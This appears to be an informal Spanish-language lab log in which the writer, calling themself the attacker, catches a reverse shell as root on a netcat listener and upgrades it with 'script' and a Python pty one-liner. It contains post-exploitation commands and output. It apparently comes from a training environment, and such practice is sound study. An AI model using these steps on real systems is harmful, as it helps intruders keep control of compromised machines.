soy yo de nuevo el atacante ya estoy en el sistema con un reverse shell

┌──(root㉿8314deb831e2)-[/]
└─# nc -lvp 4444
listening on [any] 4444 ...
connect to [172.20.0.20] from maestro_defensa.labseguridad_red_ataque [172.20.0.10] 38306
whoami
root

hare el tratamienyto de terminal para tener una mejor


alternativa si no hay python
script /dev/null -c bash

┌──(root㉿8314deb831e2)-[/]
└─# nc -lvp 4444
listening on [any] 4444 ...
connect to [172.20.0.20] from maestro_defensa.labseguridad_red_ataque [172.20.0.10] 38306
whoami
root
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@ad0559c021f9:/#

mucho mejor ahora tengo una terminal mas decente con python